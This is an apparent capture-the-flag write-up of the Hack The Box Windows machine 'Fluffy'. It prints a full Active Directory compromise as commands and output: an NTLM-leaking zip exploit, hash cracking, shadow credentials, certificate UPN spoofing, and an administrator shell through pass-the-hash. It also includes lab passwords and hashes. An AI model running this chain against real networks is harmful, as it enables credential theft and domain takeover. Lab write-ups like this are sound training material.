๐Fluffy
https://app.hackthebox.com/machines/662
Machine Information
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
Recon
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-24 21:02 CEST
Nmap scan report for fluffy.htb
Host is up (0.024s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec?
139/tcp open netbios-ssn?
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.95%I=7%D=5/24%Time=683217CE%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsUsing crackmap to check smb
โ crackmapexec smb <ip> -u j.fleischman -p J0elTHEM4n1990!
SMB 10.129.241.133 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.133 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! We can access some shares
โ smbclient -L //<ip> -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
โ smbclient //<ip>/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon May 19 16:27:02 2025
.. D 0 Mon May 19 16:27:02 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 17:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 17:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 17:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 17:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 16:31:07 2025
5842943 blocks of size 4096. 2076907 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (976.3 KiloBytes/sec) (average 976.3 KiloBytes/sec)
smb: \>
User/Root
Checking these vulns we getting a hash using this CVE
git clone https://github.com/ThemeHackers/CVE-2025-24071
cd CVE-2025-24071
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
python3 exploit.py -i <vpn> -f exploitsudo impacket-smbserver share ./share -smb2supportsmbclient //<ip>/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"[..]
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000
[..]And cracking the hash
โ cat hash
p.agila::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000
โ hashcat --identify hash
The following hash-mode match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
5600 | NetNTLMv2 | Network Protocol
โ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
[..]
P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e005000460073
0079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a00100000000000000000000000000000000000090020
0063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000:prometheusx-303
Checking with bloodhound this user
echo '<ip> fluffy.htb DC01.FLUFFY.HTB' | sudo tee -a /etc/hosts[libdefaults]
default_realm = FLUFFY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
renewable = true
[realms]
FLUFFY.HTB = {
kdc = <ip>
admin_server = <ip>
}
[domain_realm]
.fluffy.htb = FLUFFY.HTB
fluffy.htb = FLUFFY.HTBโ bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -dc DC01.FLUFFY.HTB -c All -o bloodhound_results.json -ns <ip>
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC01.FLUFFY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.FLUFFY.HTB
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 07S
ADCS + Shadow Credentials + Certificate Abuse chain starting with adding agila to the service accounts
โ bloodyAD --host <ip> -d fluffy.htb -u p.agila -p 'prometheusx-303' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service AccountsAdding malicious KeyCredential to victim using GenericWrite
โ sudo ntpdate <ip>
[sudo] password for kali:
2025-05-25 21:00:47.346476 (+0200) +25299.397345 +/- 0.010498 10.129.164.175 s1 no-leap
CLOCK: time stepped by 25299.397345
โ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account ca_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5fb2d338-1c91-6577-edb2-8a070b776431'
[*] Adding Key Credential with device ID '5fb2d338-1c91-6577-edb2-8a070b776431' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '5fb2d338-1c91-6577-edb2-8a070b776431' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8Authenticating as victim using certificate, setting UPN to administrator@domain(Spoofing) and requesting certificate with UPN=administrator(ESC1)
โ export KRB5CCNAME=ca_svc.ccache
โ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -user 'ca_svc' read
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
โ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -upn 'administrator' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
โ sudo ntpdate <ip>
2025-05-25 21:15:58.555036 (+0200) +25299.412195 +/- 0.011312 10.129.164.175 s1 no-leap
CLOCK: time stepped by 25299.412195
โ certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
โ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
โ certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip <ip>
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
โ evil-winrm -i <ip> -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Now we can get the user-flag at winrm_svc, which could have been taken before when we were adding the svc.
Last updated